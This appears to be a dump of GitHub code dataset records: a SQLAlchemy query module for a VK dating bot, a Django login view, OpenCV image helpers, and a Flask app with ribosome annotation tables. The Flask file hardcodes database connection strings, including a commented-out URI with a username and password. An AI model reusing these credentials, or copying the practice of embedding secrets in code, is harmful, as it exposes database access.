SearhPairPhoto.photo_1, SearhPairPhoto.photo_2, SearhPairPhoto.photo_3).join(SearhPair).join(UserVKTinder).filter(UserVKTinder.user_vk_id == user_vk_id, SearhPair.attribute == 2).all()\n return list_blocked_pair\n\n", "repo_name": "fomms/vkinder-diploma", "sub_path": "db/db_in_get_info.py", "file_name": "db_in_get_info.py", "file_ext": "py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tokens.Login_db", "line_number": 9, "usage_type": "name"}, {"api_name": "tokens.Password_db", "line_number": 9, "usage_type": "name"}, {"api_name": "tokens.Name_db", "line_number": 9, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 10, "usage_type": "call"}, {"api_name": "db.models.create_tables", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 12, "usage_type": "call"}, {"api_name": "vk_api_my.VKAPIusers.get_vktinder_user", "line_number": 18, "usage_type": "call"}, {"api_name": "vk_api_my.VKAPIusers", "line_number": 18, "usage_type": "name"}, {"api_name": "db.models.UserVKTinder", "line_number": 19, "usage_type": "call"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 28, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 28, "usage_type": "name"}, {"api_name": "db.models.SearhPair", "line_number": 35, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 50, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 53, "usage_type": "call"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 56, "usage_type": "call"}, {"api_name": "db.models.UserVKTinder", "line_number": 68, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 68, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 66, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 66, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 67, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 67, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 68, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 68, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 76, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 76, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_vk_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 76, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 77, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_id", "line_number": 77, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 85, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 85, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 85, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 85, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder", "line_number": 92, "usage_type": "argument"}, {"api_name": "db.models.SearhPair", "line_number": 92, "usage_type": "argument"}, {"api_name": "db.models.SearhPair.searh_pair_name", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair", "line_number": 91, "usage_type": "name"}, {"api_name": "db.models.SearhPair.searh_pair_surname", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.searh_pair_page_link", "line_number": 91, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_1", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto", "line_number": 92, "usage_type": "name"}, {"api_name": "db.models.SearhPairPhoto.photo_2", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.SearhPairPhoto.photo_3", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.UserVKTinder.user_vk_id", "line_number": 92, "usage_type": "attribute"}, {"api_name": "db.models.SearhPair.attribute", "line_number": 92, "usage_type": "attribute"}]} +{"seq_id": "22761310094", "text": "from django.shortcuts import render, redirect\nfrom chaapp.forms import PostForm\nfrom django.contrib.auth import authenticate\nfrom django.contrib import auth\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n postform = PostForm(request.POST)\n if postform.is_valid():\n username = postform.cleaned_data['username']\n pd = postform.cleaned_data['pd']\n userauth = authenticate(username=username, password=pd)\n\n if userauth is not None:\n auth.login(request, userauth)\n postform = PostForm()\n return redirect('/manage/')\n else:\n massage = '登入失敗!'\n else:\n message = '驗證碼錯誤!'\n else:\n message = '帳號、密碼及驗證碼都必須輸入!'\n postform = PostForm()\n return render(request, 'index.jinja', locals())\n\ndef manage(request):\n return render(request, 'manage.jinja', locals())", "repo_name": "NeonEDuck/chaapp", "sub_path": "chaapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "chaapp.forms.PostForm", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth", "line_number": 17, "usage_type": "name"}, {"api_name": "chaapp.forms.PostForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 19, "usage_type": "call"}, {"api_name": "chaapp.forms.PostForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "25181166915", "text": "import cv2\nimport numpy as np\n\n\ndef tensor2cvimg(src):\n '''return np.array\n uint8\n [0, 255]\n BGR\n (H, W, C)\n '''\n out = src.copy() * 255\n out = out.transpose((1, 2, 0)).astype(np.uint8)\n out = cv2.cvtColor(out, cv2.COLOR_RGB2BGR)\n\n return out\n\ndef cvimg2tensor(src):\n out = src.copy()\n out = cv2.cvtColor(out, cv2.COLOR_BGR2RGB)\n out = out.transpose((2,0,1)).astype(np.float64)\n out = out / 255\n\n return out\n", "repo_name": "akmtn/pytorch-siggraph2017-inpainting", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 184, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.uint8", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "760260152", "text": "import collections as coll\nimport csv\nfrom collections import OrderedDict, defaultdict\nfrom copy import deepcopy\nfrom flask import Flask, json, jsonify, render_template, render_template_string, request, session\nfrom sqlalchemy import tuple_\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nimport numpy as np\nimport itertools\nfrom itertools import combinations, groupby\nimport random\nimport time\nimport math\nfrom numpy import nan\nimport StringIO\nfrom definitions import ribosome_subunits\n# import scipy\n\nnp.set_printoptions(threshold=np.nan)\n# from sqlalchemy.sql.expression import case\nfrom sqlalchemy import case\n\n# from sqlalchemy.orm import relationship\n# from models import UnitCorrespondence\n# from flask_marshmallow import Marshmallow\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://webfr3d:nrw0FhuKwY2CUYa2TDPU@localhost/rna3dhub-prod'\napp.config[\n 'SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:root@127.0.0.1/rna3dhub?unix_socket=/Applications/MAMP/tmp/mysql/mysql.sock'\nBootstrap(app)\ndb = SQLAlchemy(app)\n\nfrom models import *\nfrom discrepancy import *\nfrom greedyInsertion import *\nfrom process_input import *\nfrom ordering import *\nfrom queries import *\n\n\n@app.route('/')\ndef home():\n # Debug statement\n return render_template(\"home.html\")\n\n\n@app.route('/correspondence')\ndef correspondence():\n # chain_info = '|'.join(unitid.split('|')[:3])\n # print chain_info\n\n annotation = [('4V4Q|1|AA', 'Empty', 'NO', '-', '-'), ('4V4Q|1|CA', 'Empty', 'NO', '-', '-'),\n ('4V50|1|AA', 'P-site of SSU only', 'NO', '-', '-'),\n ('4V50|1|CA', 'P-site of SSU only', 'NO', '-', '-'), ('4V5B|1|BA', 'Empty', 'NO', '-', '-'),\n ('4V5B|1|DA', 'Empty', 'NO', '-', '-'),\n ('4V9D|1|AA', 'P/E', 'Ribosome Recycling (early intermediate)', 'RRF (AY)', '-'),\n ('4V9D|1|BA', 'P/P', 'Posttermination', 'none', '-'),\n ('4V9O|1|BA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9O|1|DA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9O|1|FA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9O|1|HA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', 'Viomycin (HW)'),\n ('4V9P|1|BA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9P|1|DA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9P|1|FA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9P|1|HA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', '-'),\n ('4YBB|1|AA', 'Empty', 'NO', '-', '-'), ('4YBB|1|BA', 'Empty', 'NO', '-', '-'),\n ('5IT8|1|AA', 'Empty', 'NO', '-', '-'), ('5IT8|1|BA', 'Empty', 'NO', '-', '-'),\n ('5J5B|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J5B|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J7L|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J7L|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J88|1|AA', 'Empty', 'NO', '-', '-'), ('5J88|1|BA', 'Empty', 'NO', '-', '-'),\n ('5J8A|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J8A|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5J91|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J91|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5JC9|1|AA', 'Empty', 'NO', '-', '-'), ('5JC9|1|BA', 'Empty', 'NO', '-', '-'),\n ('5MDZ|1|2', 'P-site ', 'NO', '-', '-'), ('6BU8|1|A', 'Appears to be A/A, P/P, E/E ', 'NO', '-', '-'),\n ('6GWT|1|a', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXM|1|a', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXN|1|a', 'P/RF1', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXO|1|a', 'P/E', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6I7V|1|AA', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('6I7V|1|BA', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('4U1U|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (B6)'),\n ('4U1U|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (D6)'),\n ('4U1V|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (B6)'),\n ('4U1V|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (D6)'),\n ('4U20|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA)'),\n ('4U20|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA)'),\n ('4U24|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (BA)'),\n ('4U24|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (DA)'),\n ('4U25|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (BA)'),\n ('4U25|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (DA)'),\n ('4U26|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (B4) and Quinupristin (B6)'),\n ('4U26|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (D4) and Quinupristin (D6)'),\n ('4U27|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA) and Linopristin (B6)'),\n ('4U27|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA) and Linopristin (D6)'),\n ('4V4H|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (AA)'),\n ('4V4H|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (CA)'),\n ('4V52|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (AA & BB)'),\n ('4V52|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Neomycin (CA & DB)'),\n ('4V53|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (AA & BB)'),\n ('4V53|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Gentamycin (CA & DB)'),\n ('4V54|1|AA', 'Empty', 'Ribosome recycling', 'RRF (B6)', '-'),\n ('4V54|1|CA', 'Empty', 'Ribosome recycling', 'RRF (D6)', '-'),\n ('4V55|1|AA', 'Empty', 'Ribosome recycling', 'RRF (B6)', 'Gentamycin (AA & BB)'),\n ('4V55|1|CA', 'Empty', 'Ribosome recycling', 'RRF (D6)', 'Gentamycin (CA & DB)'),\n ('4V56|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA)'),\n ('4V56|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA)'),\n ('4V57|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (AA) and Neomycin (AA & BB)'),\n ('4V57|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Spectinomycin (CA) and Neomycin (CA & DB)'),\n ('4V64|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (AA)'),\n ('4V64|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Hygromycin B (CA)'),\n ('4V7S|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Telithromycin (BA)'),\n ('4V7S|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7T|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Chloramphenicol (BA)'),\n ('4V7T|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7U|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Erythromycin A (BA)'),\n ('4V7U|1|CA', 'Empty', 'NB', '-', '-'),\n ('4V7V|1|AA', 'Empty', 'Bound to antibiotic', '-', 'Clindamycin'),\n ('4V7V|1|CA', 'Empty', 'NB', '-', '-'), ('4V80|1|AA', '?', '?', '?', '?'),\n ('4V80|1|CA', '?', '?', '?', '?'), ('4V9C|1|AA', 'P/P', 'NO', '-', 'neomycin (AA & BA)'),\n ('4V9C|1|CA', 'P/E', 'NO', 'RRF(CY)', 'neomycin (CA & DA)'), ('4WF1|1|AA', '-', 'NB', '-', '-'),\n ('4WF1|1|CA', '-', 'Bound to antibiotic', '-', 'Negamycin (CA)'),\n ('4WOI|1|AA', 'P/E', 'Bound to antibiotic', '-', 'Paromomycin (AA & BA)'),\n ('4WOI|1|DA', 'P/P', 'Bound to antibiotic', '-', 'Paromomycin (CA & DA)'),\n ('4WWW|1|QA', 'Empty', 'Bound to antibiotic', '-', 'CEM-101 (RA)'),\n ('4WWW|1|XA', 'Empty', 'NO', '-', '-'),\n ('5KCR|1|1a', 'P/P ', 'Bound to antibiotic', '-', 'Avilamycin C (1A)'),\n ('5KCS|1|1a', 'P/P ', 'Bound to antibiotic', 'TetM (1w)', 'Evernimycin (1A)'),\n ('3J9Y|1|a', 'P/P', 'NO', 'TetM (w)', '-'),\n ('3JCD|1|a', 'P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Post EF4) ', 'EF4 (x)', '-'),\n ('3JCE|1|a', 'A/4 (6), P/4 (8), E/E (9)', 'Elongation - Backtranslocation (Pre EF4)', 'EF4 (x)', '-'),\n ('5AFI|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', 'Kirromycin (z)'),\n ('5UYK|1|A', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYL|1|A', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYM|1|A', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYN|1|A', 'T tRNA (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYP|1|A', 'A*/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5UYQ|1|A', 'A/T (Y), P/P (W), E/E (X)', 'Elongation - Decoding', 'EF-Tu (Z)', '-'),\n ('5WDT|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WE4|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu (z)', '-'),\n ('5WE6|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WF0|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFK|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('5WFS|1|a', 'A/T (y), P/P (v), E/E (w)', 'Elongation - Decoding', 'EF-Tu H84A (z)', '-'),\n ('3J9Z|1|SA', 'P/P (S6), E/E (S7)', 'Elongation - Translocation', 'EF-G (S1)', '-'),\n ('3JA1|1|SA', 'P/E (S2)', 'Elongation - Translocation', 'EF-G (S3)', '-'),\n ('3R8N|1|A', '?', 'Elongation - Translocation', '?', '-'),\n ('3R8O|1|A', '?', 'Elongation - Translocation', '?', '-'),\n ('3JCJ|1|g', 'P/I* ', 'Initiation', 'IF-2 (f)', '-'),\n ('6DNC|1|A', 'E/E (D), P/P (LA)', 'Premature Termination', 'RF1 (MA)', '-'),\n ('5NP6|1|D', 'P/P (B)', 'Recoding - Bypassing', '-', '-'), (\n '6H4N|1|a', 'E/E (w)', 'Ribosome hibernation',\n 'Ribosome modulation factor (v), ribosome hibernation promoting factor (x)', '-'),\n ('5H5U|1|h', 'P/P (5)', 'Ribosome Rescue', 'ArfA (3), RF2 (4)', '-'),\n ('5MDV|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDW|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MDY|1|2', 'P/P (5)', 'Ribosome Rescue', 'ArfA (6), RF2 (7)', '-'),\n ('5MGP|1|a', 'P/P (x)', 'Ribosome Rescue', 'ArfA (w), RF2 (z)', '-'),\n ('5U4I|1|a', 'P/P (x), E*/E (y)', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U4J|1|a', '?', 'Ribosome Rescue', 'ArfA (w), RF2 (v)', '-'),\n ('5U9F|1|A', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('5U9G|1|A', 'P/P(W), E*/E (X)', 'Ribosome Rescue', 'ArfA (Y), RF2 (Z)', '-'),\n ('6ENF|1|a', 'P/P (x)', 'Ribosome Rescue', '-', '-'),\n ('6ENJ|1|a', 'A/A (9), P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6ENU|1|a', 'P/P (x)', 'Ribosome Rescue', 'EF-P (w)', '-'),\n ('6C4I|1|a', 'P/P (x), E*/E (y)', 'Ribosome rescue', 'ArfA (w), RF-2 (v)', '-'),\n ('3JBU|1|A', 'P/P (v)', 'Ribosome Stalling', 'SecM (z)', '-'), (\n '3JBV|1|A', 'A/P* (V), P/E intermediate (W)', 'Ribosome Stalling', 'SecM (z)',\n 'Chloroamphenicol (b)'), ('5JTE|1|AA', 'A/A (AW), P/P (AX), E/E* (AY)', 'Ribosome Stalling', '-',\n 'Erythromycin A (BA), ErmBL (B5)'),\n ('5JU8|1|AA', 'P/P (AX), E*/E* (AY)', 'Ribosome Stalling', '-', 'Erythromycin A (BA), ErmBL (B5)'),\n ('5NWY|1|0', 'P/P-VemP (M)', 'Ribosome Stalling', '-', 'VemP (s)'),\n ('5O2R|1|a', 'P/P (x)', 'Ribosome Stalling', 'RF-1 (v)', 'Apidaecin (z)'),\n ('5LZA|1|a', 'P/P (v)', 'SelB activation', '-', '-'),\n ('5LZD|1|a', 'A/SelB (y), P/P (v)', 'SelB activation', 'SelB (z)', '-'),\n ('5LZE|1|a+ 5LZE|1|y+ 5LZE|1|v+ 5LZE|1|x', 'tst', 'SelB activation', 'tst', 'tst'),\n ('5IQR|1|2', 'A/R (6), P/P (5), E/E (4)', 'Stringent Control', 'RelA (8)', 'Paromomycine (2)'),\n ('5KPS|1|27', 'P/P (31), E/E (32)', 'Stringent Control', 'RelA (A)', '-'),\n ('5KPW|1|26', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5KPX|1|26', 'A/R (30), P/P (31), E/E (32)', 'Stringent Control', 'RelA (33)', '-'),\n ('5L3P|1|a', 'A/R( y), P/P (x)', 'Stringent Control', 'RelA (z)', '-'),\n ('4V85|1|AA', '-', 'Termination', 'RF3 (AW)', 'Viomycin (AY)'),\n ('4V89|1|AA', '-', 'Termination', 'RF3 (AW)', '-'),\n ('4V6C|1|AA', '-', 'Translation - elongation', '-', '-'),\n ('4V6C|1|CA', '-', 'Translation - elongation', '-', '-'),\n ('4V6D|1|AA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'),\n ('4V6D|1|CA', 'P-site ASL fragment', 'Translation - elongation', '-', '-'), (\n '4V6E|1|AA', 'A-site ASL fragment (AX), P-site ASL fragment (AV)', 'Translation - elongation',\n '-',\n '-'), (\n '4V6E|1|CA', 'A-site ASL fragment (CX), P-site ASL fragment (CV)', 'Translation - elongation',\n '-',\n '-')]\n\n annotation_LSU = [('4V4Q|1|BB', 'Empty', 'NO', '-', '-'), ('4V4Q|1|DB', 'Empty', 'NO', '-', '-'),\n ('4V50|1|BB', 'P-site of SSU only', 'NO', '-', '-'),\n ('4V50|1|DB', 'P-site of SSU only', 'NO', '-', '-'), ('4V5B|1|AB', 'Empty', 'NO', '-', '-'),\n ('4V5B|1|CB', 'Empty', 'NO', '-', '-'),\n ('4V9D|1|CA', 'P/E', 'Ribosome Recycling (early intermediate)', 'RRF (AY)', '-'),\n ('4V9D|1|DA', 'P/P', 'Posttermination', 'none', '-'),\n ('4V9O|1|AA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9O|1|CA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9O|1|EA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9O|1|GA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', 'Viomycin (HW)'),\n ('4V9P|1|AA', 'Empty', 'Elongation - pretranslocation', 'EF-G (BV)', 'Viomycin (BW)'),\n ('4V9P|1|CA', 'Empty', 'Elongation - pretranslocation', 'EF-G (DV)', 'Viomycin (DW)'),\n ('4V9P|1|EA', 'Empty', 'Elongation - pretranslocation', 'EF-G (FV)', 'Viomycin (FW)'),\n ('4V9P|1|GA', 'Empty', 'Elongation - pretranslocation', 'EF-G (HV)', '-'),\n ('4YBB|1|DA', 'Empty', 'NO', '-', '-'), ('4YBB|1|CA', 'Empty', 'NO', '-', '-'),\n ('5IT8|1|DA', 'Empty', 'NO', '-', '-'), ('5IT8|1|CA', 'Empty', 'NO', '-', '-'),\n ('5J5B|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J5B|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J7L|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (AA)'),\n ('5J7L|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tetracycline (BA)'),\n ('5J88|1|DA', 'Empty', 'NO', '-', '-'), ('5J88|1|CA', 'Empty', 'NO', '-', '-'),\n ('5J8A|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J8A|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5J91|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (AA)'),\n ('5J91|1|CA', 'Empty', 'Bound to antibiotic', '-', 'Tigecycline (BA)'),\n ('5JC9|1|DA', 'Empty', 'NO', '-', '-'), ('5JC9|1|CA', 'Empty', 'NO', '-', '-'),\n ('5MDZ|1|1', 'P-site ', 'NO', '-', '-'),\n ('6BU8|1|01', 'Appears to be A/A, P/P, E/E ', 'NO', '-', '-'),\n ('6GWT|1|A', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXM|1|A', 'P/RF1 ', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXN|1|A', 'P/RF1', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6GXO|1|A', 'P/E', 'Termination', 'RF1 (v), RF3 (w)', 'Apidaecin (z)'),\n ('6I7V|1|CA*', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('6I7V|1|DA*', 'Empty', 'Ribosome heterogeneity ', '-', '-'),\n ('4U1U|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (B6)'),\n ('4U1U|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Quinupristin (D6)'),\n ('4U1V|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (B6)'),\n ('4U1V|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Linopristin (D6)'),\n ('4U20|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA)'),\n ('4U20|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA)'),\n ('4U24|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (BA)'),\n ('4U24|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (DA)'),\n ('4U25|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (BA)'),\n ('4U25|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Virginiamycin (DA)'),\n ('4U26|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (B4) and Quinupristin (B6)'),\n ('4U26|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Dalfopristin (D4) and Quinupristin (D6)'),\n ('4U27|1|BA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (BA) and Linopristin (B6)'),\n ('4U27|1|DA', 'Empty', 'Bound to antibiotic', '-', 'Flopristin (DA) and Linopristin (D6)'),\n ('4V4H|1|BB', 'Empty', 'Bound to antibiotic', '-', 'Kasugamycin (AA)'),\n ('4V4H|1|DB', 